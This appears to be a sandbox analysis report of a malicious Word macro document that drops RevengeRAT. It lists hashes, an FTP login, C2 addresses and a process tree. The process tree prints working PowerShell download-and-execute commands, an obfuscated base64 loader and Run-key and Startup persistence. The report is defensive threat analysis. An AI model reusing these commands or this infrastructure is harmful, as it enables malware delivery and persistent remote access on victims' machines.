Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system -
submitted
01-08-2024 07:18
Behavioral task
behavioral1
Sample
Flytour.docm
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Flytour.docm
Resource
win10v2004-20240730-en
General
-
Target
Flytour.docm
-
Size
109KB
-
MD5
639df28efc7717655b1d8cc618a76b1c
-
SHA1
9e79c9d82ad07f95b09e73bbba792a889911f51e
-
SHA256
861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc
-
SHA512
62fdd2c3b2da4481c4cb380e01a37c67f7005e5024cef3b960883b227b659e056680152d2d72002a1496e293e7f97a47d3a67f8ab890b63209a00f19862a3d6c
-
SSDEEP
1536:vkc1B8Tf5nq7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuB/xDC:vV2ClwH9r0l77AnsSmy/B/xDC
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
developerpro21578Jp@@
Extracted
revengerat
NyanCatRevenge
marcelotatuape.ddns.net:333
3e042ee793c84
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4196 2524 powershell.exe WINWORD.EXE -
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 44 4196 powershell.exe 46 4196 powershell.exe 50 4808 powershell.exe 52 4808 powershell.exe 55 4808 powershell.exe 57 4808 powershell.exe 59 4808 powershell.exe 60 4808 powershell.exe 63 4076 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_w = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft SyS\\isltf.ps1' \";exit" powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2688 powershell.exe 4076 powershell.exe 5052 powershell.exe 4808 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4076 set thread context of 4360 4076 powershell.exe RegAsm.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2524 WINWORD.EXE 2524 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4196 powershell.exe 4196 powershell.exe 5052 powershell.exe 5052 powershell.exe 4808 powershell.exe 4808 powershell.exe 4808 powershell.exe 2688 powershell.exe 2688 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2524 WINWORD.EXE 2524 WINWORD.EXE 2524 WINWORD.EXE 2524 WINWORD.EXE 2524 WINWORD.EXE 2524 WINWORD.EXE 2524 WINWORD.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
WINWORD.EXEpowershell.exeexplorer.exeWScript.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 2524 wrote to memory of 4196 2524 WINWORD.EXE powershell.exe PID 2524 wrote to memory of 4196 2524 WINWORD.EXE powershell.exe PID 4196 wrote to memory of 3548 4196 powershell.exe explorer.exe PID 4196 wrote to memory of 3548 4196 powershell.exe explorer.exe PID 1764 wrote to memory of 3592 1764 explorer.exe WScript.exe PID 1764 wrote to memory of 3592 1764 explorer.exe WScript.exe PID 3592 wrote to memory of 5052 3592 WScript.exe powershell.exe PID 3592 wrote to memory of 5052 3592 WScript.exe powershell.exe PID 5052 wrote to memory of 4808 5052 powershell.exe powershell.exe PID 5052 wrote to memory of 4808 5052 powershell.exe powershell.exe PID 4808 wrote to memory of 2688 4808 powershell.exe powershell.exe PID 4808 wrote to memory of 2688 4808 powershell.exe powershell.exe PID 4808 wrote to memory of 4076 4808 powershell.exe powershell.exe PID 4808 wrote to memory of 4076 4808 powershell.exe powershell.exe PID 4808 wrote to memory of 2448 4808 powershell.exe cmd.exe PID 4808 wrote to memory of 2448 4808 powershell.exe cmd.exe PID 4076 wrote to memory of 4360 4076 powershell.exe RegAsm.exe PID 4076 wrote to memory of 4360 4076 powershell.exe RegAsm.exe PID 4076 wrote to memory of 4360 4076 powershell.exe RegAsm.exe PID 4076 wrote to memory of 4360 4076 powershell.exe RegAsm.exe PID 4076 wrote to memory of 4360 4076 powershell.exe RegAsm.exe PID 4076 wrote to memory of 4360 4076 powershell.exe RegAsm.exe PID 4076 wrote to memory of 4360 4076 powershell.exe RegAsm.exe PID 4076 wrote to memory of 4360 4076 powershell.exe RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Flytour.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/rgZiV9iE/8r-wKti0.d13d81b1839707719820361a64160ba8 -o test.js; explorer.exe test.js2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" test.js3⤵PID:3548
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $vCHvw = 'J⅕BS⅕H⅕⅕RwBK⅕GI⅕I⅕⅕9⅕C⅕⅕J⅕Bo⅕G8⅕cwB0⅕C4⅕VgBl⅕HI⅕cwBp⅕G8⅕bg⅕u⅕E0⅕YQBq⅕G8⅕cg⅕u⅕EU⅕cQB1⅕GE⅕b⅕Bz⅕Cg⅕Mg⅕p⅕Ds⅕SQBm⅕C⅕⅕K⅕⅕k⅕FI⅕c⅕BH⅕Eo⅕Yg⅕p⅕C⅕⅕ew⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕SQBP⅕C4⅕U⅕Bh⅕HQ⅕a⅕Bd⅕Do⅕OgBH⅕GU⅕d⅕BU⅕GU⅕bQBw⅕F⅕⅕YQB0⅕Gg⅕K⅕⅕p⅕Ds⅕Z⅕Bl⅕Gw⅕I⅕⅕o⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕Ow⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕n⅕Gg⅕d⅕B0⅕H⅕⅕cw⅕6⅕C8⅕LwBk⅕HI⅕aQB2⅕GU⅕LgBn⅕G8⅕bwBn⅕Gw⅕ZQ⅕u⅕GM⅕bwBt⅕C8⅕dQBj⅕D8⅕ZQB4⅕H⅕⅕bwBy⅕HQ⅕PQBk⅕G8⅕dwBu⅕Gw⅕bwBh⅕GQ⅕JgBp⅕GQ⅕PQ⅕n⅕Ds⅕J⅕BI⅕FQ⅕WQBm⅕HY⅕I⅕⅕9⅕C⅕⅕J⅕Bl⅕G4⅕dg⅕6⅕F⅕⅕UgBP⅕EM⅕RQBT⅕FM⅕TwBS⅕F8⅕QQBS⅕EM⅕S⅕BJ⅕FQ⅕RQBD⅕FQ⅕VQBS⅕EU⅕LgBD⅕G8⅕bgB0⅕GE⅕aQBu⅕HM⅕K⅕⅕n⅕DY⅕N⅕⅕n⅕Ck⅕OwBp⅕GY⅕I⅕⅕o⅕CQ⅕S⅕BU⅕Fk⅕ZgB2⅕Ck⅕I⅕B7⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕PQ⅕g⅕Cg⅕J⅕Bo⅕FM⅕QQBI⅕H⅕⅕I⅕⅕r⅕C⅕⅕JwBX⅕DE⅕MQ⅕y⅕EE⅕Z⅕BQ⅕GY⅕SQ⅕w⅕F⅕⅕Qw⅕3⅕Gg⅕YgBz⅕GM⅕aQBf⅕DU⅕Xw⅕w⅕F8⅕ZQBV⅕Dc⅕TgB3⅕E0⅕WgBo⅕GY⅕N⅕B4⅕Cc⅕KQ⅕g⅕Ds⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ew⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕o⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕Kw⅕g⅕Cc⅕MQBi⅕HI⅕ag⅕1⅕Go⅕cQBu⅕HE⅕UgB4⅕EM⅕R⅕⅕2⅕FY⅕a⅕Bm⅕Gg⅕QQBu⅕DI⅕cgBj⅕FY⅕ZgBz⅕FI⅕bw⅕3⅕EQ⅕O⅕Bn⅕HI⅕Jw⅕p⅕C⅕⅕OwB9⅕Ds⅕J⅕Bm⅕Hc⅕UwBZ⅕H⅕⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BG⅕Gk⅕b⅕Bl⅕Cg⅕J⅕BV⅕FI⅕T⅕BL⅕EI⅕L⅕⅕g⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕I⅕⅕7⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕PQ⅕g⅕Cg⅕JwBD⅕Do⅕X⅕BV⅕HM⅕ZQBy⅕HM⅕X⅕⅕n⅕C⅕⅕Kw⅕g⅕Fs⅕RQBu⅕HY⅕aQBy⅕G8⅕bgBt⅕GU⅕bgB0⅕F0⅕Og⅕6⅕FU⅕cwBl⅕HI⅕TgBh⅕G0⅕ZQ⅕g⅕Ck⅕Ow⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕9⅕C⅕⅕K⅕⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕Cs⅕I⅕⅕n⅕Fw⅕VQBw⅕Hc⅕aQBu⅕C4⅕bQBz⅕HU⅕Jw⅕p⅕Ds⅕I⅕Bw⅕G8⅕dwBl⅕HI⅕cwBo⅕GU⅕b⅕Bs⅕C4⅕ZQB4⅕GU⅕I⅕B3⅕HU⅕cwBh⅕C4⅕ZQB4⅕GU⅕I⅕⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕v⅕HE⅕dQBp⅕GU⅕d⅕⅕g⅕C8⅕bgBv⅕HI⅕ZQBz⅕HQ⅕YQBy⅕HQ⅕I⅕⅕7⅕C⅕⅕QwBv⅕H⅕⅕eQ⅕t⅕Ek⅕d⅕Bl⅕G0⅕I⅕⅕n⅕CU⅕R⅕BD⅕F⅕⅕SgBV⅕CU⅕Jw⅕g⅕C0⅕R⅕Bl⅕HM⅕d⅕Bp⅕G4⅕YQB0⅕Gk⅕bwBu⅕C⅕⅕K⅕⅕g⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BB⅕H⅕⅕c⅕BE⅕GE⅕d⅕Bh⅕Fw⅕UgBv⅕GE⅕bQBp⅕G4⅕ZwBc⅕E0⅕aQBj⅕HI⅕bwBz⅕G8⅕ZgB0⅕Fw⅕VwBp⅕G4⅕Z⅕Bv⅕Hc⅕cwBc⅕FM⅕d⅕Bh⅕HI⅕d⅕⅕g⅕E0⅕ZQBu⅕HU⅕X⅕BQ⅕HI⅕bwBn⅕HI⅕YQBt⅕HM⅕X⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕Cc⅕I⅕⅕p⅕C⅕⅕LQBm⅕G8⅕cgBj⅕GU⅕I⅕⅕7⅕H⅕⅕bwB3⅕GU⅕cgBz⅕Gg⅕ZQBs⅕Gw⅕LgBl⅕Hg⅕ZQ⅕g⅕C0⅕YwBv⅕G0⅕bQBh⅕G4⅕Z⅕⅕g⅕Cc⅕cwBs⅕GU⅕ZQBw⅕C⅕⅕MQ⅕4⅕D⅕⅕Jw⅕7⅕C⅕⅕cwBo⅕HU⅕d⅕Bk⅕G8⅕dwBu⅕C4⅕ZQB4⅕GU⅕I⅕⅕v⅕HI⅕I⅕⅕v⅕HQ⅕I⅕⅕w⅕C⅕⅕LwBm⅕C⅕⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ewBb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBT⅕GU⅕cgB2⅕Gk⅕YwBl⅕F⅕⅕bwBp⅕G4⅕d⅕BN⅕GE⅕bgBh⅕Gc⅕ZQBy⅕F0⅕Og⅕6⅕FM⅕ZQBy⅕HY⅕ZQBy⅕EM⅕ZQBy⅕HQ⅕aQBm⅕Gk⅕YwBh⅕HQ⅕ZQBW⅕GE⅕b⅕Bp⅕GQ⅕YQB0⅕Gk⅕bwBu⅕EM⅕YQBs⅕Gw⅕YgBh⅕GM⅕aw⅕g⅕D0⅕I⅕B7⅕CQ⅕d⅕By⅕HU⅕ZQB9⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕E4⅕ZQB0⅕C4⅕UwBl⅕HI⅕dgBp⅕GM⅕ZQBQ⅕G8⅕aQBu⅕HQ⅕TQBh⅕G4⅕YQBn⅕GU⅕cgBd⅕Do⅕OgBT⅕GU⅕YwB1⅕HI⅕aQB0⅕Hk⅕U⅕By⅕G8⅕d⅕Bv⅕GM⅕bwBs⅕C⅕⅕PQ⅕g⅕Fs⅕UwB5⅕HM⅕d⅕Bl⅕G0⅕LgBO⅕GU⅕d⅕⅕u⅕FM⅕ZQBj⅕HU⅕cgBp⅕HQ⅕eQBQ⅕HI⅕bwB0⅕G8⅕YwBv⅕Gw⅕V⅕B5⅕H⅕⅕ZQBd⅕Do⅕OgBU⅕Gw⅕cw⅕x⅕DI⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕g⅕D0⅕I⅕⅕o⅕E4⅕ZQB3⅕C0⅕TwBi⅕Go⅕ZQBj⅕HQ⅕I⅕BO⅕GU⅕d⅕⅕u⅕Fc⅕ZQBi⅕EM⅕b⅕Bp⅕GU⅕bgB0⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBD⅕HI⅕ZQBk⅕GU⅕bgB0⅕Gk⅕YQBs⅕HM⅕I⅕⅕9⅕C⅕⅕bgBl⅕Hc⅕LQBv⅕GI⅕agBl⅕GM⅕d⅕⅕g⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBO⅕GU⅕d⅕B3⅕G8⅕cgBr⅕EM⅕cgBl⅕GQ⅕ZQBu⅕HQ⅕aQBh⅕Gw⅕K⅕⅕n⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕MQ⅕n⅕Cw⅕JwBk⅕GU⅕dgBl⅕Gw⅕bwBw⅕GU⅕cgBw⅕HI⅕bw⅕y⅕DE⅕NQ⅕3⅕Dg⅕SgBw⅕E⅕⅕Q⅕⅕n⅕Ck⅕Ow⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕D0⅕I⅕⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BT⅕HQ⅕cgBp⅕G4⅕Zw⅕o⅕C⅕⅕JwBm⅕HQ⅕c⅕⅕6⅕C8⅕LwBk⅕GU⅕cwBj⅕Gs⅕dgBi⅕HI⅕YQB0⅕DE⅕Q⅕Bm⅕HQ⅕c⅕⅕u⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕LgBj⅕G8⅕bQ⅕u⅕GI⅕cg⅕v⅕FU⅕c⅕Bj⅕HI⅕eQBw⅕HQ⅕ZQBy⅕C8⅕M⅕⅕y⅕C8⅕R⅕BM⅕Ew⅕M⅕⅕x⅕C4⅕d⅕B4⅕HQ⅕Jw⅕g⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕GQ⅕aQBz⅕H⅕⅕bwBz⅕GU⅕K⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕I⅕⅕9⅕C⅕⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕FQ⅕ZQB4⅕HQ⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕XQ⅕6⅕Do⅕VQBU⅕EY⅕O⅕⅕7⅕CQ⅕TQBX⅕GY⅕dQBh⅕C⅕⅕PQ⅕g⅕CQ⅕dwBW⅕F⅕⅕b⅕B1⅕C4⅕R⅕Bv⅕Hc⅕bgBs⅕G8⅕YQBk⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕Ck⅕OwBb⅕EI⅕eQB0⅕GU⅕WwBd⅕F0⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕QwBv⅕G4⅕dgBl⅕HI⅕d⅕Bd⅕Do⅕OgBG⅕HI⅕bwBt⅕EI⅕YQBz⅕GU⅕Ng⅕0⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕u⅕FI⅕ZQBw⅕Gw⅕YQBj⅕GU⅕K⅕⅕g⅕Cc⅕kyE6⅕JMhJw⅕g⅕Cw⅕I⅕⅕n⅕EE⅕Jw⅕g⅕Ck⅕I⅕⅕p⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕EE⅕c⅕Bw⅕EQ⅕bwBt⅕GE⅕aQBu⅕F0⅕Og⅕6⅕EM⅕dQBy⅕HI⅕ZQBu⅕HQ⅕R⅕Bv⅕G0⅕YQBp⅕G4⅕LgBM⅕G8⅕YQBk⅕Cg⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕Ck⅕LgBH⅕GU⅕d⅕BU⅕Hk⅕c⅕Bl⅕Cg⅕I⅕⅕n⅕EM⅕b⅕Bh⅕HM⅕cwBM⅕Gk⅕YgBy⅕GE⅕cgB5⅕DM⅕LgBD⅕Gw⅕YQBz⅕HM⅕MQ⅕n⅕C⅕⅕KQ⅕u⅕Ec⅕ZQB0⅕E0⅕ZQB0⅕Gg⅕bwBk⅕Cg⅕I⅕⅕n⅕H⅕⅕cgBG⅕FY⅕SQ⅕n⅕C⅕⅕KQ⅕u⅕Ek⅕bgB2⅕G8⅕awBl⅕Cg⅕J⅕Bu⅕HU⅕b⅕Bs⅕Cw⅕I⅕Bb⅕G8⅕YgBq⅕GU⅕YwB0⅕Fs⅕XQBd⅕C⅕⅕K⅕⅕g⅕Cc⅕Mg⅕y⅕CU⅕OQ⅕3⅕D⅕⅕MwBj⅕GY⅕N⅕⅕0⅕GI⅕Z⅕⅕z⅕DU⅕YQ⅕1⅕GM⅕N⅕⅕3⅕DQ⅕Ng⅕y⅕GI⅕NwBi⅕GU⅕O⅕⅕y⅕Dk⅕O⅕⅕x⅕DI⅕Zg⅕2⅕DI⅕Mg⅕l⅕D0⅕dg⅕m⅕GQ⅕YQBv⅕Gw⅕bgB3⅕G8⅕Z⅕⅕9⅕GU⅕YwBy⅕HU⅕bwBz⅕CY⅕d⅕B4⅕HQ⅕Lg⅕0⅕DI⅕M⅕⅕y⅕C4⅕Nw⅕w⅕C4⅕M⅕⅕z⅕Dc⅕Mg⅕l⅕Dc⅕Mg⅕l⅕Dg⅕LQBG⅕FQ⅕VQBE⅕DM⅕JQBB⅕DI⅕JQBl⅕G0⅕YQBu⅕GU⅕b⅕Bp⅕GY⅕KwBC⅕DM⅕JQ⅕y⅕DI⅕JQB0⅕Hg⅕d⅕⅕u⅕DQ⅕Mg⅕w⅕DI⅕Lg⅕3⅕D⅕⅕Lg⅕w⅕DM⅕Mg⅕y⅕CU⅕R⅕⅕z⅕CU⅕ZQBt⅕GE⅕bgBl⅕Gw⅕aQBm⅕Cs⅕Qg⅕z⅕CU⅕d⅕Bu⅕GU⅕bQBo⅕GM⅕YQB0⅕HQ⅕YQ⅕9⅕G4⅕bwBp⅕HQ⅕aQBz⅕G8⅕c⅕Bz⅕Gk⅕Z⅕⅕t⅕HQ⅕bgBl⅕HQ⅕bgBv⅕GM⅕LQBl⅕HM⅕bgBv⅕H⅕⅕cwBl⅕HI⅕PwB0⅕Hg⅕d⅕⅕u⅕GU⅕N⅕⅕1⅕DM⅕N⅕⅕y⅕DQ⅕Mg⅕3⅕Dk⅕O⅕⅕1⅕C0⅕NQBl⅕Dc⅕OQ⅕t⅕GY⅕Yw⅕2⅕DQ⅕LQ⅕0⅕DU⅕N⅕⅕4⅕C0⅕M⅕⅕5⅕Dc⅕ZgBh⅕D⅕⅕NQ⅕1⅕C8⅕bwBR⅕E8⅕MgBM⅕HU⅕M⅕Bv⅕C8⅕cwBt⅕GU⅕d⅕Bp⅕C8⅕bQBv⅕GM⅕LgB0⅕Gg⅕ZwBp⅕Ho⅕LgBu⅕GQ⅕Yw⅕u⅕D⅕⅕bg⅕u⅕DE⅕cgB0⅕C4⅕NwBw⅕C8⅕Lw⅕6⅕HM⅕c⅕B0⅕HQ⅕a⅕⅕n⅕C⅕⅕L⅕⅕g⅕Cc⅕JQBE⅕EM⅕U⅕BK⅕FU⅕JQ⅕n⅕Cw⅕I⅕⅕n⅕FQ⅕cgB1⅕GU⅕MQ⅕n⅕C⅕⅕KQ⅕g⅕Ck⅕OwB9⅕Ds⅕';$vCHvw = $vCHvw.replace('⅕','A') ;$vCHvw = [System.Convert]::FromBase64String( $vCHvw ) ;;;$vCHvw = [System.Text.Encoding]::Unicode.GetString( $vCHvw ) ;$vCHvw = $vCHvw.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $vCHvw3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$RpGJb = $host.Version.Major.Equals(2);If ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ($HTYfv) {$hSAHp = ($hSAHp + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient) ;$fwSYp.Encoding = [System.Text.Encoding]::UTF8 ;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu') ;$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$wVPlu.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$MWfua = $wVPlu.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$wVPlu.dispose();$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$MWfua = $wVPlu.DownloadString( $MWfua );[Byte[]] 